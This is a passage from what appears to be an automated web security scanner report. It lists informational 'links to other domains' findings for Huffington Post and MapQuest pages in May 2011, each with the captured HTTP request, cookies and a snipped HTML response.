<li><a href="http://www.hitchensweb.com/" target="_blank">Christopher Hitchens</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/lowry/lowry.asp/" target="_blank">Rich Lowry</a>
...[SNIP]...
<li><a href="http://www.thenation.com/blogs/thebeat " target="_blank">John Nichols</a>
...[SNIP]...
<li><a href="http://online.wsj.com/public/page/peggy-noonan.html" target="_blank">Peggy Noonan</a>
...[SNIP]...
<li><a href="http://slate.msn.com/?id=3944&cp=68090&nav=navom" target="_blank">Jack Shafer</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/sweet/" target="_blank">Lynn Sweet</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html" target="_blank">George Will</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/author/16/michael-wolff.html" target="_blank">Michael Wolff</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://music.aol.com/">AOL MUSIC</a>
...[SNIP]...
<li><a href="http://sixapart.com">Powered by Movable Type</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&amp;cg=0&amp;cc=1&amp;ts=noscript" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://vertical-stats.huffpost.com/?-1&&" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="//pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home" style="display:none" height="1" width="1" alt="Quantcast" />
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
<a href="#" class="close_modal" onclick="Modal.hideMask('hp_vertical_common_lightbox');return false;">
           <img width="70" height="22" alt="" src="http://s.huffpost.com/images/modal/close-home.gif" />
        </a>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

16.88. http://www.huffingtonpost.com/blogs_front.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /blogs_front.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/blogs_front.html?1304559867&vertical=homepage&doubleclick=huffpost.premium/front
The response contains the following link to another domain:
  • http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg

Request

GET /blogs_front.html?1304559867&vertical=homepage&doubleclick=huffpost.premium/front HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304576918960-New%7C1367648918960%3B%20s_nrgvo%3DNew%7C1367648918961%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.17.9.1304575182212

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=116
Date: Thu, 05 May 2011 01:51:56 GMT
Connection: close
Content-Length: 74433


<div id="top_featured_post">
<!-- BEGIN top_featured_post CONTENT -->

<div id="top_blog">

   <div class="entry no_border" id="blog_857784" onmouseover="TrackingData.blog_857784={id:857784,blog_id
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...

16.89. http://www.huffingtonpost.com/news_col_1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /news_col_1.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/news_col_1.html?1304557810&vertical=homepage&doubleclick=huffpost.premium/front
The response contains the following links to other domains:
  • http://s.huffpost.com/images/hoton_twitter3.png
  • http://www.nytimes.com/2011/05/04/us/politics/04torture.html
  • http://www.reuters.com/subjects/bin-laden-compound

Request

GET /news_col_1.html?1304557810&vertical=homepage&doubleclick=huffpost.premium/front HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=60
Date: Thu, 05 May 2011 01:39:50 GMT
Connection: close
Content-Length: 42271

<div id="center_entries_container">
<!-- BEGIN center_entries_container CONTENT -->


<div id="entry_857738" onmouseover="TrackingData.entry_857738={id:857738,blog_id:2,rank:1,zone:5,vertical:-1
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...

16.90. http://www.huffingtonpost.com/news_col_2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /news_col_2.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/news_col_2.html?1304557811&vertical=homepage&doubleclick=huffpost.premium/front
The response contains the following links to other domains:
  • http://aol.com/video/930944537001
  • http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/
  • http://s.huffpost.com/images/hoton_twitter3.png

Request

GET /news_col_2.html?1304557811&vertical=homepage&doubleclick=huffpost.premium/front HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:39:44 GMT
Connection: close
Content-Length: 33009

<div id="rc_upper">
<!-- BEGIN rc_upper CONTENT -->


<div id="entry_857648" onmouseover="TrackingData.ent
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...

16.91. http://www.huffingtonpost.com/permalink-tracker.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/permalink-tracker.html?vertical=world
The response contains the following link to another domain:
  • http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js

Request

GET /permalink-tracker.html?vertical=world HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=25
Date: Thu, 05 May 2011 01:00:35 GMT
Connection: close
Content-Length: 1324

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   <!-- Config -->    
   <
...[SNIP]...

16.92. http://www.huffingtonpost.com/threeup.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=1&h=0
The response contains the following links to other domains:
  • http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg
  • http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg
  • http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg
  • http://s.huffpost.com/images/blank.gif

Request

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=1&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:37 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857597" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/recep-tayyip-erdogan-convoy-attack_n_857624.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273845/thumbs/r-RECEP-TAYYIP-ERDOGAN-ATTACK-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857624" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/fatah-hamas-reconciliation-deal_n_857336.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273618/thumbs/r-FATAH-HAMAS-RECONCILIATION-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857336" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-prepared-to-escape_n_857453.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273708/thumbs/r-OSAMA-BIN-LADEN-ESCAPE-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857453" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/south-korea-crucifixion-b_n_857375.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273648/thumbs/r-SOUTH-KOREA-CRUCIFIXION-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857375" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/india-girls-neglect_n_857389.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');"><img src="http://s.huffpost.com/images/blank.gif" alt="http://i.huffpost.com/gen/273675/thumbs/r-INDIA-MALNOURISHED-GIRLS-medium260.jpg" border="0" width="260" height="75" id="threeup_image_857389" />        </a>
...[SNIP]...

16.93. http://www.mapquest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.mapquest.com/?ncid=txtlnkmqmq00000001
The response contains the following links to other domains:
  • http://adinfo.aol.com/about-our-ads/
  • http://autos.aol.com/
  • http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico
  • http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/logo.png
  • http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/page_link_image.gif
  • http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston
  • http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint
  • http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
  • http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
  • http://daol.aol.com/main
  • http://jobs.aol.com/
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/os/mapquest/marketing/Mothers-Day.png
  • http://o.aolcdn.com/os/mapquest/promo-images/newmq/questy_tear.png
  • http://privacy.aol.com/
  • http://realestate.aol.com/
  • http://sns-static.aolcdn.com/openauth/aolauth.min.js
  • http://travel.aol.com/
  • http://travel.aol.com/flights
  • http://twitter.com/mapquest
  • http://www.aol.com/
  • http://www.facebook.com/mapquest
  • http://www.mapquestapi.com/link-to-mapquest/
  • http://www.mapquesthelp.com/
  • http://www.mapquesthelp.com/app/answers/detail/a_id/949/
  • http://www.moviefone.com/
  • http://www.rentedspaces.com/

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:11 GMT
Content-Length: 32072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
<meta property="fb:app_id" content="324090988325" />
   <link rel="SHORTCUT ICON" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico"/>

<link rel="image_src" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/page_link_image.gif">

<!-- MAIN JS -->
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<meta name="ROBOTS" content="NOODP,NOYDIR"/>

   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston" media="screen, projection, print" rel="stylesheet" type="text/css" />
   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<div id="noscript">
